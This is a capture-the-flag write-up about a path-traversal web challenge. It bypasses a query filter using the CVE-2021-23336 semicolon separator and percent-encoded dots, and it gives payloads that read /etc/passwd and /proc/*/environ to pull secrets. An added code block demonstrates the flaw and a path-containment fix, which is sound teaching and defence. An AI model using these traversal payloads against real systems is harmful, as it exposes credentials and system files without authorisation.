Download the challenge source and open index.py to analyse it:
    from urllib.parse import unquote

    def view(request):
        context = {}
        try:
            context['request'] = request
            clientId = getClientID(request.client.host)  # per-instance parameter name (e.g. 'id')
            # Filter: no '&' or '.' in the raw query string, no '.' in the decoded filename value
            if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
                raise
            filename = request.query_params[clientId]
            # Every parameter name (already URL-decoded by the framework) is joined into the path unchecked
            path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
            f = open(path, 'r')
            contents = f.readlines()
            f.close()
            context['filename'] = filename
            context['contents'] = contents
        # (the except branch and the return are not part of the excerpt shown here)
The key part of this challenge is `path`: whatever it points to is read and echoed back, and the flag is in the directory one level up.
Constructing the payload
Two checks have to be bypassed, the one on request.url.query and the one on request.query_params. The first is handled by using `;` instead of `&` as the parameter separator: the server runs Python 3.9.0, which is affected by CVE-2021-23336 (parse_qsl() still treats `;` as a query-argument separator); details here: urllib parse_qsl(): Web cache poisoning - semicolon as a query args separator — Python Security 0.0 documentation. The `.` check is sidestepped by percent-encoding: the raw query string only ever contains `%2e`, and the filter decodes the filename value but never the parameter names, which the framework has already decoded to `/../` by the time they are joined into the path.
Construct the payload:
/view?id=flag;/%2e%2e/   # the parameter name (id) differs per instance; adjust it to your own
The flag file turns out not to contain the flag we need; going by the usual habits of the BUU environment, it is surely hidden in an environment variable again.
/view?id=etc/passwd;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
/view?id=proc/self/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
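Added example, not code from the challenge or from this writeup: it emulates the pre-fix parse_qsl() behaviour that the `;` trick relies on, rebuilds the path exactly as view() does for the /etc/passwd payload above, and shows the resolved-path containment check the view should have used instead of string filtering. The names legacy_parse_qsl, build_challenge_path, is_inside_memo and MEMO_DIR are assumptions made for the demonstration.

```python
import re
from pathlib import Path
from urllib.parse import parse_qsl, unquote_plus

MEMO_DIR = Path("./memo")  # assumed base directory, mirrors the challenge's './memo/'


def legacy_parse_qsl(query: str):
    """Emulate parse_qsl() before the CVE-2021-23336 fix: '&' and ';' both split pairs."""
    pairs = []
    for chunk in re.split(r"[&;]", query):
        if not chunk:
            continue
        key, _, value = chunk.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))  # keys are decoded too
    return pairs


def current_parse_qsl(query: str):
    """parse_qsl() on a patched interpreter: only '&' separates pairs (separator pinned)."""
    return parse_qsl(query, keep_blank_values=True, separator="&")


def build_challenge_path(query: str, client_id: str, parse):
    """Rebuild the path the way view() does; return None when its filter rejects the query."""
    params = dict(parse(query))
    filename = params.get(client_id, "")
    if "&" in query or "." in query or "." in unquote_plus(filename):
        return None  # the challenge's string-based filter fires
    # The decoded parameter names ('/../') are concatenated unchecked: the traversal sink.
    return "./memo/" + "".join(params.keys()) + "/" + filename


def is_inside_memo(path: str) -> bool:
    """Hardened check: resolve the final path and require it to stay under MEMO_DIR."""
    base = MEMO_DIR.resolve()
    target = Path(path).resolve()
    return target == base or base in target.parents


# Constructed queries: the /etc/passwd payload from the writeup and a benign request.
ESCAPE_QUERY = "id=etc/passwd;" + "/%2e%2e" * 6 + "/"
BENIGN_QUERY = "id=notes"

if __name__ == "__main__":
    for name, parse in (("legacy", legacy_parse_qsl), ("patched", current_parse_qsl)):
        built = build_challenge_path(ESCAPE_QUERY, "id", parse)
        print(name, built, None if built is None else is_inside_memo(built))
```

On a patched interpreter the whole `;/../...` tail stays inside the filename value, so even the challenge's own `.` filter rejects it; on the legacy parser the filter passes and only the containment check catches the escape.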
Still no flag, so try brute-forcing the PID with Burp (going by CTF authors' habits).
/proc/{pid}/environ is commonly used to read SECRET_KEY or FLAG from the environment variables.
Final payload:
/view?id=proc/1/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
flag{164a7a69-230f-4cd8-8cdf-69f81dd9f674}